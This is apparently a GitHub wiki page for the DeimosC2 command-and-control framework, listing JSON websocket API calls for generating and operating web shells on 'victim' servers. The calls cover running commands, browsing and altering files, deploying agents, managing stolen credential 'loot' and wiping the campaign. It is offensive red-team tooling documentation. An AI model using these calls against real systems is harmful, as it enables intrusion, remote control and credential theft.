-
Notifications
You must be signed in to change notification settings - Fork 167
API Examples
DeimosC2 leverages API calls over websockets in order to interact form the frontend to the backend. This allows for flexibility of the server and seemless interaction. Why over websockets you ask? Because it is 2020 and technology evolves!
The following are a list of the APIs in their entirety. They will also be broken down into each individual section of the Wiki.
Generate web shell
{
"Type": "WebShell",
"FunctionName": "GenerateShell",
"Data": {"type":"aspx"}
}
Initialize Web Shell after placing it on victim server
{
"Type": "WebShell",
"FunctionName": "Init",
"Data": {"URL":"http://10.30.10.138/jomfwujVVhOoiFGVNroGeMWun.aspx", "AuthToken":"4763c98e-cf19-4bd4-abdd-59e18de60329"}
}
Execute a CMD (or shell) command through the web shell
{
"Type": "WebShell",
"FunctionName": "ExecuteCommand",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["cmd","whoami"]}"
}
Execute a PowerShell command through a web shell (if Windows)
{
"Type": "WebShell",
"FunctionName": "ExecuteCommand",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["power","whoami"]}"
}
Browse the victims file system through the web shell
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\"]}
}
Remove files or directories (if empty) through the file browser
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\foo\\woot.txt", "remove"]}
}
Download files through the file browser
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\foo\\woot.txt", "download"]}
}
Make a directory through the file browser
{
"Type": "WebShell",
"FunctionName": "FileBrowser",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:\\foo\\woot\\", "mkdir"]}
}
Read files on the victim server through the web shell
{
"Type": "WebShell",
"FunctionName": "FileEditor",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:/inetpub/wwwroot/shells/boo.txt", "read", ""]}
}
Write to files on the victim server through the web shell
{
"Type": "WebShell",
"FunctionName": "FileEditor",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329", "Options":["C:/inetpub/wwwroot/shells/boo.txt", "write", "woot"]}
}
Upload File through web shell
{
"Type":"WebShell",
"FunctionName":"FileUpload",
"Data":{"UUID":"d38ced43-ed13-4e06-8daf-366158d49355","Options":["test_upload.txt","C:\\test\\","PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo="]}
}
Delete WebShell
{
"Type": "WebShell",
"FunctionName": "DeleteShell",
"Data": {"UUID":"4763c98e-cf19-4bd4-abdd-59e18de60329"}
}
Upload an Agent to the WebShell and delete webshell
{
"Type": "WebShell",
"FunctionName": "DeployAgent",
"Data":{"UUID":"d38ced43-ed13-4e06-8daf-366158d49355","Options":["TCP_Agent.exe","C:\\test\\","<b64 data of agent bytes>"]}
}
List Web Shells
{
"Type": "WebShell",
"FunctionName": "List",
"Data": {}
}
Add user through Admin API
{
"Type": "Admin",
"FunctionName": "AddUser",
"Data": {"Options":["lowprivuser","mypassword","0"]}
}
Edit user password or username through the API
{
"Type": "Admin",
"FunctionName": "EditUser",
"Data": {"UserID":"48cc33bb-558a-421d-81cd-896366c55323", "username":"", "password":"","admin":"1"}
}
Delete user through the Admin API
{
"Type": "Admin",
"FunctionName": "DeleteUser",
"Data": {"Options":["61c9dbf1-efd7-44a8-9f8b-8db803f51aa6"]}
}
Set MFA and Password Length in App Settings through Admin API
{
"Type": "Admin",
"FunctionName": "AppSettings",
"Data": {"Options":["true", "16"]}
}
List App Settings
{
"Type": "Admin",
"FunctionName": "ListAppSettings",
"Data": {}
}
List all active users
{
"Type": "Admin",
"FunctionName": "ListUsers",
"Data": {}
}
Force a reset of a users password and/or mfa using users UUID
{
"Type": "Admin",
"FunctionName": "ResetUser",
"Data": {"Options":["fdbc8f50-71e6-443a-ac6d-889fa262f3a6"]}
}
List Backup Schedule
{
"Type": "Admin",
"FunctionName": "ListBackupSchedule",
"Data": {}
}
List all Loot
{
"Type": "Loot",
"FunctionName": "List",
"Data": {}
}
List loot based on agent
{
"Type": "Loot",
"FunctionName": "ListAgentLoot",
"Data": {"agentName": "61c9dbf1-efd7-44a8-9f8b-8db803f51aa6"}
}
Add password in Loot based on hash (EditPass)
{
"Type": "Loot",
"FunctionName": "EditPass",
"Data": {"password": "supersecret", "hash": "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"}
}
Add loot manually
{
"Type": "Loot",
"FunctionName": "Add",
"Data": {"agentName": "f8f2a1c4-1922-43c1-9709-5573f5cceadd", "userName": "blah", "password": "blah", "hash": "blah", "credtype": "blah", "host": "blah", "domain": "blah", "webshell": false}
}
List LootFiles (agentname and other directories under /looted/ are passed to variable path)
{
"Type": "Loot",
"FunctionName": "ListLootFiles",
"Data": {"path":""}
}
Get a backup of logs, C2 Database, looted data, and web server certs and keys
{
"Type": "Archive",
"FunctionName": "Backup",
"Data": {"Backup":true}
}
Make a backup of the same files but shutdown the campaign/webserver and delete the files from the C2 instance
{
"Type": "Archive",
"FunctionName": "EndGame",
"Data": {"Backup":false}
}
Schedule backups to occur
{
"Type": "Archive",
"FunctionName": "SetSchedule",
"Data": {"Status": true, "Hour":"15:26", "Days":["Thursday"]}
}
Get the list of binaries and the go file for that listener
{
"Type": "Listener",
"FunctionName": "GetCompiled",
"Data": {"Key":"1c6059b4-61ae-4844-a67c-f68b61fef727"}
}
- Server Prerequisites
- Grabbing Compiled Version
- Compiling from Source
- Starting the C2 Server
- Setting up First User
- Server Options
- API Examples
- Starting a Listener
- Listener Menu
- Agent Menu
- Loot Menu
- Archiving / Endgame
- Agent Creation
- Agent Obfuscation
- Agent Terminal CLI
- Using Modules
- Building Modules
- Compiling Modules
- Generating Webshell
- Initializing WebShell
- WebShell CLI
- WebShell File Browser
- Deploying Agent through WebShell